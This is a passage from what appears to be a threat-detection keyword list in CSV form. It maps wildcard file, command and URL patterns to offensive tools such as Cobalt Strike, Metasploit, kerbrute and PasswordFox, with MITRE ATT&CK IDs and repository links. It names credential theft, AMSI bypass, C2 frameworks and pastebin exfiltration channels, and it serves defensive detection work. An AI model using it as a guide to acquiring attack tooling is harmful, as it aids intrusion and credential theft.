+"*password_prompt_spoof.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*password|passwort|passwd|*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*PasswordBoxImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*Password-Default/service.txt*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*passwordfox.exe*","offensive_tool_keyword","passwordfox","PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default. PasswordFox displays the passwords stored in your current profile. but you can easily select to watch the passwords of any other Firefox profile. For each password entry. the following information is displayed: Record Index. Web Site. User Name. Password. User Name Field. Password Field. and the Signons filename.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*passwordfox.zip*","offensive_tool_keyword","passwordfox","PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default. PasswordFox displays the passwords stored in your current profile. but you can easily select to watch the passwords of any other Firefox profile. For each password entry. the following information is displayed: Record Index. Web Site. User Name. Password. User Name Field. Password Field. and the Signons filename.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*passwordfox-x64.zip*","offensive_tool_keyword","passwordfox","PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default. PasswordFox displays the passwords stored in your current profile. but you can easily select to watch the passwords of any other Firefox profile. For each password entry. the following information is displayed: Record Index. Web Site. User Name. Password. User Name Field. Password Field. and the Signons filename.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Passwords/Leaked-Databases*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Passwords_in_description.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Password-Scripts*","offensive_tool_keyword","Password-Scripts","Password Scripts xploitation ","T1210 - T1555 - T1110 - T1554 - T1553","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/laconicwolf/Password-Scripts","1","0","N/A","N/A","1","99","37","2019-10-08T17:57:49Z","2017-10-20T17:17:23Z" +"*PasswordSpray *","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!","t1110 - T1114 - T1555","TA0006 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","N/A","10","1498","354","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" +"*passwordspray*--user-as-pass*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*passwordspray.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*passwordSprayCmd*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*pastebin.com*/raw/* ","greyware_tool_keyword","pastebin","pastebin raw access content - abused by malwares to retrieve payloads","T1119","TA0009","Redline Stealer","N/A","Collection","pastebin.com","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*pastebin.com*/rw/*","greyware_tool_keyword","pastebin","pastebin raw access content - abused by malwares to retrieve payloads","T1119","TA0009","Redline Stealer","N/A","Collection","pastebin.com","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*pastebin.com*api/api_post.php*","greyware_tool_keyword","pastebin","pastebin POST url - abused by malwares to exfiltrate informations","T1102 - T1048 - T1094 - T1608.001","TA0011","N/A","N/A","Data Exfiltration","pastebin.com","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*pasv and port both active*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*patator ftp_login host=* user=FILE0 0=*.txt *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*patator*","offensive_tool_keyword","patator","Patator was written out of frustration from using Hydra. Medusa. Ncrack. Metasploit modules and Nmap NSE scripts for password guessing attacks. I opted for a different approach in order to not create yet another brute-forcing tool and avoid repeating the same shortcomings. Patator is a multi-threaded tool written in Python. that strives to be more reliable and flexible than his fellow predecessors.","T1110 - T1111 - T1210 - T1558.004","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/lanjelot/patator","1","0","N/A","N/A","10","3284","776","2023-09-25T06:06:20Z","2014-08-25T00:56:21Z" +"*Patch-AMSI.*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*patchAmsiOpenSession*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","10","10","363","67","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" +"*Patch-ETW.*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*Pateensy/PaensyLib/*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*--path docToDump.xls*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*path_dll_hijack.h*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","0","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" +"*pathhijack.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*PaulSec/twittor*","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","743","254","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" +"*PayGen*python3 generate.py*","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","0","N/A","N/A",,"N/A",,, +"*payload start tetanus*","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://github.com/MythicAgents/tetanus","1","0","N/A","N/A","3","229","33","2023-05-14T21:34:20Z","2022-03-07T20:35:33Z" +"*payload.c *","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034","1","0","N/A","N/A","1","97","16","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" +"*payload.csproj*","offensive_tool_keyword","scshell","network pentestration test (shell)","T1071.001 - T1071.004 - T1046 - T1059 - T1024","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*payload.sct *","offensive_tool_keyword","scshell","network pentestration test (shell)","T1071.001 - T1071.004 - T1046 - T1059 - T1024","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*payload/encryptor_remote.py*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*payload_bootstrap_hint*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*payload_creator.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*payload_encryption.py*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*payload_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*payload_local*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*payload_msf.c*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" +"*payload_msf.exe*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" +"*payload_scripts.cna*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*payload_scripts/sleepmask*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*payload_section.cpp*","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","10","10","156","30","2023-05-23T20:34:26Z","2022-03-13T17:43:29Z" +"*payload_section.hpp*","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","10","10","156","30","2023-05-23T20:34:26Z","2022-03-13T17:43:29Z" +"*payload_spellshell.c*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" +"*payload_spellshell.exe*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" +"*payload_tidy.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Payload_Type/freyja/*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*PayloadCommsHost*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*--payload-cookie*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"*Payload-Download-Cradles*","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense 